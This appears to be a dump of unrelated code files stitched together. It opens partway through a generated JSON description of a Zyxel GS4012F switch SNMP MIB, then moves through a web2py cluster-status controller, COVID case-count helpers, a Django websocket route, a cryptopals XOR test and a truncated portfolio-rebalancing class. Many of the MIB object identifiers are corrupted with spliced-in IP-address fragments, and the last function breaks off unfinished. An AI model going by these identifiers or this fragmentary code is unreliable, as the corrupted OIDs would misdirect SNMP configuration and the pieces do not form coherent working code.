"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.20.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"ranges" : [
{
"min" : "0",
"max" : "128"
},
],
"range" : {
"min" : "0",
"max" : "128"
},
},
},
"access" : "readwrite",
"description" :
"""A string of octets containing one bit per VLAN for
VLANS with VlanIndex values 1024 through 2047. The
first octet corresponds to VLANs with VlanIndex values
1024 through 1031; the second octet to VLANs 1032
through 1039 etc. The most significant bit of each
octet corresponds to the lowest VlanIndex value in that
octet.
For each VLAN that is mapped to this MSTP instance,
the bit corresponding to that VLAN is set to '1'.
Empty (zero) most significant octes are not mandatory.""",
}, # column
"mstMapVlans3k" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.20.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"ranges" : [
{
"min" : "0",
"max" : "128"
},
],
"range" : {
"min" : "0",
"max" : "128"
},
},
},
"access" : "readwrite",
"description" :
"""A string of octets containing one bit per VLAN for
VLANS with VlanIndex values 2048 through 3071. The
first octet corresponds to VLANs with VlanIndex values
of 2048 through 2055; the second octet to VLANs 2056
through 2063 etc. The most significant bit of each
octet corresponds to the lowest VlanIndex value in that
octet.
For each VLAN that is mapped to this MSTP instance,
the bit corresponding to that VLAN is set to '1'.
Empty (zero) most significant octes are not mandatory.""",
}, # column
"mstMapVlans4k" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.20.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"ranges" : [
{
"min" : "0",
"max" : "128"
},
],
"range" : {
"min" : "0",
"max" : "128"
},
},
},
"access" : "readwrite",
"description" :
"""A string of octets containing one bit per VLAN for
VLANS with VlanIndex values 3072 through 4095. The
first octet corresponds to VLANs with VlanIndex values
3072 through 3079; the second octet to VLANs 3080
through 3087 etc. The most significant bit of each
octet corresponds to the lowest VlanIndex value in that
octet.
For each VLAN that is mapped to this MSTP instance,
the bit corresponding to that VLAN is set to '1'.
Empty (zero) most significant octes are not mandatory.""",
}, # column
"mstMapRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.20.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mstVlanTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.30",
"status" : "current",
"description" :
"""This table contains one entry for each VlanId.""",
}, # table
"mstVlanEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.30.1",
"status" : "current",
"linkage" : [
"mstVlanIndex",
],
"description" :
"""Information regarding the instance to which each Vlan is mapped.""",
}, # row
"mstVlanIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.30.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "4094"
},
],
"range" : {
"min" : "1",
"max" : "4094"
},
},
},
"access" : "noaccess",
"description" :
"""The VlanId for which this entry contains the instance mapped.""",
}, # column
"mstVlanMstIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.30.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"ZYXEL-GS4012F-MIB", "name" : "MstiOrCistInstanceIndex"},
},
"access" : "readonly",
"description" :
"""An integer with values ranging from 0 to 64 that identify a
the CIST/MSTI instance to which this VLAN is mapped""",
}, # column
"mstpPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.40",
"status" : "current",
"description" :
"""A table that contains generic information about
every port that is associated with this bridge.""",
}, # table
"mstpPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.40.1",
"status" : "current",
"linkage" : [
"mstpPortIndex",
],
"description" :
"""A list of information for each port of the
bridge.""",
}, # row
"mstpPortIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10172.16.58.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "65535"
},
],
"range" : {
"min" : "1",
"max" : "65535"
},
},
},
"access" : "noaccess",
"description" :
"""A unique value, greater than zero, for each Port.
The value for each interface sub-layer
must remain constant at least from one re-initialization
of the entity's network management system to the next re-
initialization.""",
}, # column
"mstpPortOperEdgePort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.40.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "TruthValue"},
},
"access" : "readonly",
"description" :
"""""",
"reference>" :
"""""",
}, # column
"mstpPortOperPointToPointMAC" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.40.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "TruthValue"},
},
"access" : "readonly",
"description" :
"""""",
"reference>" :
"""""",
}, # column
"mstpXstTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.50",
"status" : "current",
"description" :
""".""",
}, # table
"mstpXstEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.50.1",
"status" : "current",
"linkage" : [
"mstpXstId",
],
"description" :
""".""",
}, # row
"mstpXstId" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.50.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"ZYXEL-GS4012F-MIB", "name" : "MstiOrCistInstanceIndex"},
},
"access" : "readonly",
"description" :
"""0 means CIST.""",
}, # column
"mstpXstBridgePriority" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.50.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "61440"
},
],
"range" : {
"min" : "0",
"max" : "61440"
},
},
},
"access" : "readwrite",
"default" : "32768",
"description" :
"""Bridge priority, in steps of 4096.""",
}, # column
"mstpXstBridgeId" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.192.168.127.12",
"status" : "current",
"syntax" : {
"type" : { "module" :"BRIDGE-MIB", "name" : "BridgeId"},
},
"access" : "readonly",
"description" :
""".""",
}, # column
"mstpXstInternalRootCost" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.192.168.3.11",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
""".""",
}, # column
"mstpXstRootPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.50.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
""".""",
}, # column
"mstpXstTimeSinceTopologyChange" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.50.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "TimeTicks"},
},
"access" : "readonly",
"description" :
""".""",
}, # column
"mstpXstTopologyChangesCount" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.50.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "Counter32"},
},
"access" : "readonly",
"description" :
""".""",
}, # column
"mstpXstPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.60",
"status" : "current",
"description" :
""".""",
}, # table
"mstpXstPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.60.1",
"status" : "current",
"linkage" : [
"mstpXstPortXstId",
"mstpXstPortIndex",
],
"description" :
""".""",
"reference>" :
""".""",
}, # row
"mstpXstPortXstId" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.107.60.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"ZYXEL-GS4012F-MIB", "name" : "MstiOrCistInstanceIndex"},
},
"access" : "noaccess",
"description" :
"""0 means CIST.""",
}, # column
"mstpXstPortIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.192.168.127.12",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "65535"
},
],
"range" : {
"min" : "1",
"max" : "65535"
},
},
},
"access" : "readonly",
"description" :
"""The value of mstpPortIndex of the Port
in mstpPortTable.""",
}, # column
"mstpXstPortEnable" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.192.168.127.12",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
""".""",
}, # column
"mstpXstPortPriority" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.60.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "255"
},
],
"range" : {
"min" : "0",
"max" : "255"
},
},
},
"access" : "readwrite",
"default" : "128",
"description" :
"""Port priority, in steps of 16.""",
}, # column
"mstpXstPortPathCost" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.60.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "65535"
},
],
"range" : {
"min" : "1",
"max" : "65535"
},
},
},
"access" : "readwrite",
"description" :
""".""",
}, # column
"mstpXstPortState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.60.1.6",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"disabled" : {
"nodetype" : "namednumber",
"number" : "0"
},
"discarding" : {
"nodetype" : "namednumber",
"number" : "1"
},
"learning" : {
"nodetype" : "namednumber",
"number" : "2"
},
"forwarding" : {
"nodetype" : "namednumber",
"number" : "3"
},
"unknown" : {
"nodetype" : "namednumber",
"number" : "4"
},
},
},
"access" : "readonly",
"description" :
""".""",
}, # column
"mstpXstPortDesignatedRoot" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.60.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"BRIDGE-MIB", "name" : "BridgeId"},
},
"access" : "readonly",
"description" :
""".""",
}, # column
"mstpXstPortDesignatedCost" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.60.1.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
""".""",
}, # column
"mstpXstPortDesignatedBridge" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.60.1.9",
"status" : "current",
"syntax" : {
"type" : { "module" :"BRIDGE-MIB", "name" : "BridgeId"},
},
"access" : "readonly",
"description" :
""".""",
}, # column
"mstpXstPortDesignatedPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.60.1.10",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
""".""",
}, # column
"mstpNotifications" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.70",
}, # node
}, # nodes
"notifications" : {
"eventOnTrap" : {
"nodetype" : "notification",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.37.2.1",
"status" : "current",
"objects" : {
"eventSeqNum" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventEventId" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventName" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventSetTime" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventSeverity" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventInstanceType" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventInstanceId" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventInstanceName" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventServAffective" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventDescription" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"trapPersistence" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"trapSenderNodeId" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"sysObjectID" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
},
"description" :
"""This trap is used to inform network management system that a delta
fault event (events that are automatically cleared) has occured
or a normal fault event (not automatically cleared) state has
been set on.
Objects are used as follows:
- eventSeqNum is the sequence number of the event. For normal
type of events must equal to the sequence number of the event
in the events table.
- eventEventId specifies what fault event has occured.
- eventName specifies the name of the fault event.
- eventSetTime indicates when fault event has occured
(delta events) or when fault has been set on (normal events).
- eventSeverity reports the severity level of the event.
- eventInstanceType indicates what kind of object is faulty.
- eventInstanceId specifies what instance is faulty.
- eventInstanceName may contain textual description for
the faulty object.
- eventServAffective specifies whether the event is
immediately service affcetive.
- eventDescription reports possible additional information about the event.
- trapPersistence tells whether this event is a delta or normal event.
- trapSenderNodeId specifies the node ID of the sending network element if
configuring it is supported for the network element, otherwise 0.
- sysObjectID specifies what kind of equipment reports the fault event.
For more information see the eventTable specification""",
}, # notification
"eventClearedTrap" : {
"nodetype" : "notification",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.37.2.2",
"status" : "current",
"objects" : {
"eventSeqNum" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventEventId" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventSetTime" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventInstanceType" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventInstanceId" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"trapRefSeqNum" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"trapSenderNodeId" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"sysObjectID" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
},
"description" :
"""This trap is used to inform network management system that a normal
type fault event has been cleared (state set off).
Objects are used as follows:
- eventSeqNum is the sequence number of the this clearing event. Note that
the sequence number of the cleared event is reported in the trapRefSeqNum
object.
- eventEventId specifies what event has been cleared.
- eventSetTime indicates when fault event has been cleared.
- eventInstanceType indicates what kind of object has been
faulty.
- eventInstanceId specifies what instance has been faulty.
- trapRefSeqNum specifies the sequence number of the cleared event (i.e.
the sequence number was assigned for the event in the events table).
- trapSenderNodeId specifies the node ID of the sending network element if
configuring it is supported for the network element, otherwise 0.
- sysObjectID specifies what kind of equipment reports the clearing event.
For more information see the eventTable specification""",
}, # notification
"newRoot" : {
"nodetype" : "notification",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.2.1",
"status" : "current",
"objects" : {
"mrstpBridgeIndex" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
},
"description" :
"""""",
}, # notification
"topologyChange" : {
"nodetype" : "notification",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.2.2",
"status" : "current",
"objects" : {
"mrstpBridgeIndex" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
},
"description" :
"""""",
}, # notification
"newRoot" : {
"nodetype" : "notification",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.70.1",
"status" : "current",
"objects" : {
"mstpXstId" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
},
"description" :
"""""",
}, # notification
"topologyChange" : {
"nodetype" : "notification",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.70.2",
"status" : "current",
"objects" : {
"mstpXstId" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
},
"description" :
"""""",
}, # notification
}, # notifications
}
| StarcoderdataPython |
3338270 | import numpy as np
def rmse(predictions, targets):
return np.sqrt(((predictions-targets)**2).mean()) | StarcoderdataPython |
1765942 | # -*- coding: utf-8 -*-
### required - do no delete
import sys
import os
import shutil
import gluon.contrib.simplejson
from datetime import datetime
sys.path.append(os.path.abspath('./../'))
from modules import fflock_globals
from modules import fflock_utility
master_color = "#317b80"
storage_color = "#609194"
warning_color = "#DD0000"
slave_color = "#92dce0"
busy_color = "#df1c1c"
idle_color = "#000000"
error_color = "#CC2222"
finished_color = "#28be9b"
def user(): return dict(form=auth())
def download(): return response.download(request,db)
def call(): return service()
### end requires
def index():
return dict(message="Index")
def submit():
form = FORM(TABLE(TR("Job Type:", SELECT('Transcode', 'Custom', _name="jobtype", requires=IS_IN_SET(['Transcode', 'Custom']))),
TR("Input:", INPUT(_type="text", _name="input", requires=IS_NOT_EMPTY())),
TR("Output", INPUT(_type="text", _name="output", requires=IS_NOT_EMPTY())),
TR("Pre-Options:", INPUT(_type="text", _name="preoptions")),
TR("Options", INPUT(_type="text", _name="options")),
TR("Encoder", SELECT('ffmpeg', 'ffmbc', 'avconv', _name="encoder", requires=IS_IN_SET(['ffmpeg', 'ffmbc', 'avconv']))),
TR("Compare Frame Count", INPUT(_type="checkbox", _name="framecount")),
TR("", INPUT(_type="submit", _value="SUBMIT"))))
if form.accepts(request, session):
response.flash = "form accepted"
elif form.errors:
response.flash = "form is invalid"
return dict(form=form, vars=form.vars)
def status():
return dict()
def status_data_servers():
#servers = SQLTABLE(db().select(db.Servers.ServerType, db.Servers.State), headers='fieldname:capitalize')
#servers = SQLFORM.grid(db.Servers, searchable=False, details=False, sortable=False, csv=False, formstyle="divs")
servers = db(db.Servers).select()
servertable = ""
if not db(db.Servers).isempty():
servertable = "<table id='box-table-a'>"
servertable += "<thead><tr><th scope='col' id='ServerType'>Server Type</th><th scope='col' id='LocalIP'>Local IP</th><th scope='col' id='LocalIP'>Public IP</th></tr></thead>"
#servertable += "<tfoot><tr><td>...</td></tr></tfoot>"
servertable += "<tbody>"
for server in servers.sort(lambda server: server.ServerType):
serveruuid = server.UUID
bgcolor = slave_color
statecolor = idle_color
if server.State == 1: statecolor = busy_color
if server.ServerType == "Slave":
bgcolor = warning_color
connectivity = db(db.Connectivity.SlaveServerUUID == server.UUID).select()
for connection in connectivity:
if connection.Connected == 1:
bgcolor = slave_color
if server.ServerType == "Storage":
bgcolor = warning_color
storage = db(db.Storage.ServerUUID == server.UUID).select()
for share in storage:
bgcolor = storage_color
if server.ServerType == "Master":
bgcolor = master_color
servertable = servertable + "<tr ALIGN='left' STYLE='background:%s; color:%s; font-variant: small-caps;'>" % (bgcolor, statecolor) + "<td>" + server.ServerType + "</td><td>" + server.LocalIP + "</td><td>" + server.PublicIP + "</td></tr>"
serverjobs = db(db.Jobs.AssignedServerUUID == serveruuid).select(orderby=~db.Jobs.CreatedTime)
bgcolor = slave_color
for serverjob in serverjobs:
statecolor = idle_color
bgcolor = slave_color
if serverjob.State == 1: statecolor = busy_color
elif serverjob.State == 2: statecolor = finished_color
elif serverjob.State > 2: statecolor = error_color
if serverjob.JobType == "Master": bgcolor = master_color
if serverjob.JobType == "Storage": bgcolor = storage_color
if serverjob.JobType == "Slave": bgcolor = slave_color
servertable = servertable + "<tr ALIGN='left' STYLE='background:%s; color:%s; font-variant: small-caps;'>" % (bgcolor, statecolor) + "<td style='padding-left:2em;'>" + serverjob.JobSubType + "</td><td nowrap='wrap' style='max-width:300px;'>" + ((str(serverjob.JobInput)[:25] + '..') if len(str(serverjob.JobInput)) > 25 else serverjob.JobInput) + "</td><td nowrap='wrap' style='max-width:300px;'>" + ((str(serverjob.JobOutput)[:25] + '..') if len(str(serverjob.JobOutput)) > 25 else serverjob.JobOutput) + "</td></tr>"
servertable += "</tbody></table>"
else:
servertable = "<div>No servers are currently running.</div>"
return servertable
def status_data_jobs():
#jobs = SQLTABLE(db().select(db.Jobs.JobType, db.Jobs.JobSubType, db.Jobs.JobInput, db.Jobs.JobOutput, db.Jobs.State, db.Jobs.Assigned, db.Jobs.Progress), headers='fieldname:capitalize')
#jobs = SQLFORM.grid(db.Jobs, searchable=False, details=False, sortable=False, csv=False)
masterjobs = db(db.Jobs.JobType == "Master").select(orderby=~db.Jobs.CreatedTime)
table = ""
if not db(db.Jobs).isempty():
table = "<table id='box-table-a'>"
table += "<thead><tr><th scope='col' id='JobType'>Job Type</th><th scope='col' id='Job Sub-Type'>Action</th><th scope='col' id='Command'>Command</th></tr></thead>"
#table += "<thead><tr><th scope='col' id='JobType'>Job Type</th><th scope='col' id='Job Sub-Type'>Sub-Type</th><th scope='col' id='Command'>Command</th></tr></thead>"
#table += "<tfoot><tr><td>...</td></tr></tfoot>"
table += "<tbody>"
for masterjob in masterjobs:
masteruuid = masterjob.UUID
bgcolor = master_color
statecolor = idle_color
table = table + "<tr ALIGN='left' STYLE='background:%s; color:%s; font-variant: small-caps;'>" % (bgcolor, statecolor) + "<td>" + masterjob.JobType + "</td><td>" + masterjob.JobSubType + "</td><td>" + masterjob.Command + "</td></tr>"
#display sub-jobs for each master job
subjobs = db(db.Jobs.MasterUUID == masteruuid).select(orderby=~db.Jobs.CreatedTime)
bgcolor = slave_color
for subjob in subjobs:
statecolor = idle_color
bgcolor = slave_color
if subjob.State == 1: statecolor = busy_color
elif subjob.State == 2: statecolor = finished_color
elif subjob.State > 2: statecolor = error_color
if subjob.JobType == "Master": bgcolor = master_color
if subjob.JobType == "Storage": bgcolor = storage_color
if subjob.JobType == "Slave": bgcolor = slave_color
table = table + "<tr ALIGN='left' STYLE='background:%s; color:%s; font-variant: small-caps;'>" % (bgcolor, statecolor) + "<td style='padding-left:2em;'>" + subjob.JobType + "</td><td>" + subjob.JobSubType + "</td><td>" + subjob.Command + "</td></tr>"
table = table + "<tr><td><br><br></td><td></td><td></td></tr>"
else:
table = "<div>No jobs currently queued.</div>"
return table
def status_data_storage():
storage = SQLTABLE(db().select(db.Storage.StorageType, db.Storage.LocalPathNFS, db.Storage.PublicPathNFS), headers='fieldname:capitalize')
#storage = SQLFORM.grid(db.Storage, searchable=False, details=False, sortable=False, csv=False)
return storage.xml()
def status_data_connectivity():
connectivity = SQLTABLE(db().select(db.Connectivity.ALL), headers='fieldname:capitalize')
#connectivity = SQLFORM.grid(db.Connectivity, searchable=False, details=False, sortable=False, csv=False)
return connectivity.xml()
def manage():
return dict(message="manage")
def help():
return dict(message="help")
def error():
return dict()
def my_upload():
import re
fileApp = request.vars.pic
filename = fileApp.filename.replace(' ', '')
result=''
http_host=''
#Prevent special caracters in the file name
expression = '[*+~$&^#@!;:,|]'
regex = re.compile(expression)
if regex.search(filename):
result="Special caracters NO!!! Nothing to do..."
return response.json('<div class="error_wrapper">\
<div id="title__error" class="error" style="display: inline-block;">'\
+result+\
'</div></div>')
aux = db.files.file.store(fileApp, filename)
db.files.insert(file=aux, title=filename)
if request.env.http_x_forwarded_host:
http_host = request.env.http_x_forwarded_host.split(':',1)[0]
else:
http_host = request.env.http_host
last = db().select(db.files.ALL)[-1]
result=T('Successfuly! Here the link: ')
result+="<a href=http://"+http_host+'/'+request.application+'/'+request.controller+'/download/'+last.file+">Donwload</a>"
return response.json('<div class="alert alert-success">'\
+result+\
'</div>')
def jobs():
return dict()
def jobs_data_jobs():
masterjobs = db(db.Jobs.JobType == "Master").select(orderby=~db.Jobs.CreatedTime)
table = ""
if not db(db.Jobs).isempty():
table = "<table id='box-table-a'>"
#table += "<thead><tr><th scope='col' id='JobType'>Job Type</th><th scope='col' id='Job Sub-Type'>Sub-Type</th><th scope='col' id='Command'>Command</th></tr></thead>"
#table += "<tfoot><tr><td>...</td></tr></tfoot>"
table += "<tbody>"
for masterjob in masterjobs:
masteruuid = masterjob.UUID
bgcolor = master_color
statecolor = idle_color
table = table + "<tr ALIGN='left' STYLE='background:%s; color:%s; font-variant: small-caps;'>" % (bgcolor, statecolor) + "<td>" + masterjob.JobType + "</td><td>" + masterjob.JobSubType + "</td><td>" + masterjob.Command + "</td></tr>"
#display sub-jobs for each master job
subjobs = db(db.Jobs.MasterUUID == masteruuid).select(orderby=~db.Jobs.CreatedTime)
bgcolor = slave_color
for subjob in subjobs:
statecolor = idle_color
bgcolor = slave_color
if subjob.State == 1: statecolor = busy_color
elif subjob.State == 2: statecolor = finished_color
elif subjob.State > 2: statecolor = error_color
if subjob.JobType == "Master": bgcolor = master_color
if subjob.JobType == "Storage": bgcolor = storage_color
if subjob.JobType == "Slave": bgcolor = slave_color
table = table + "<tr ALIGN='left' STYLE='background:%s; color:%s; font-variant: small-caps;'>" % (bgcolor, statecolor) + "<td style='padding-left:2em;'>" + subjob.JobType + "</td><td>" + subjob.JobSubType + "</td><td>" + subjob.Command + "</td></tr>"
table = table + "<tr><td><br><br></td><td></td><td></td></tr>"
else:
table = "<div>No jobs currently queued.</div>"
return table
| StarcoderdataPython |
1648528 | def get_newcases(cases, new):
c = newcases = newcasesmedia = 0
newst = []
record = []
for row in cases:
record.append(row)
for row in record:
if c == 14:
break
if c == 0:
newcases = int(row.totcasos)
newst.append(row.totcasos)
newst.insert(0, new['confirmados'])
if len(newst) >= 15:
for i in range(len(newst)):
if i == 15:
break
newcasesmedia = newcasesmedia + (int(newst[i-1]) - int(newst[(i)]))
else:
processed = {'novoscasos': 0, 'novoscasosmedia': 0}
return processed
newcasesmedia = round((newcasesmedia/270)*100)
newcases = new['confirmados'] - newcases
processed = {'novoscasos': newcases, 'novoscasosmedia': newcasesmedia}
return processed
def get_graph_data(db):
dbrecord = {'datagraph': [], 'novoscasos': [], 'novoscasosmedia': [], 'uti' : []}
record =[]
for row in db: #limit 14
record.append(row)
for row in reversed(range(len(record))):
dbrecord['datagraph'].append(record[row].datagraph)
dbrecord['novoscasos'].append(record[row].newcases)
dbrecord['novoscasosmedia'].append(record[row].newcasesmedia)
dbrecord['uti'].append(record[row].uti)
return dbrecord
| StarcoderdataPython |
3395568 | <reponame>AktanKasymaliev/django-video-hosting
from django.urls import path
from . import consumers
websocket_urlpatterns = [
path('ws/video/<int:video_id>/', consumers.CommentsConsumer.as_asgi()),
] | StarcoderdataPython |
165941 | <reponame>douglasnaphas/cryptopals-py
import unittest
from set1.challenge2_fixed_XOR.s1c2 import S1C2
from parameterized import parameterized
class TestS1C2(unittest.TestCase):
@parameterized.expand([
( "1c0111001f010100061a024b53535009181c",
"686974207468652062756c6c277320657965",
"746865206b696420646f6e277420706c6179" ),
])
def test_fixed_XOR(self, a, b, expected):
self.assertEqual(S1C2.fixed_XOR(a, b), expected)
| StarcoderdataPython |
1743921 | import numpy as np
from .. import tools
from ..algo import Algo
class DynamicCRP(Algo):
# use logarithm of prices
PRICE_TYPE = "ratio"
def __init__(self, n=None, min_history=None, **kwargs):
self.n = n
self.opt_weights_kwargs = kwargs
if min_history is None:
if n is None:
min_history = 252
else:
min_history = n
super().__init__(min_history=min_history)
def init_weights(self, columns):
m = len(columns)
self._importances = np.zeros(m)
# use uniform weights until you get enough history
return self.opt_weights_kwargs.get("max_leverage", 1.0) * np.ones(m) / m
def step(self, x, last_b, history):
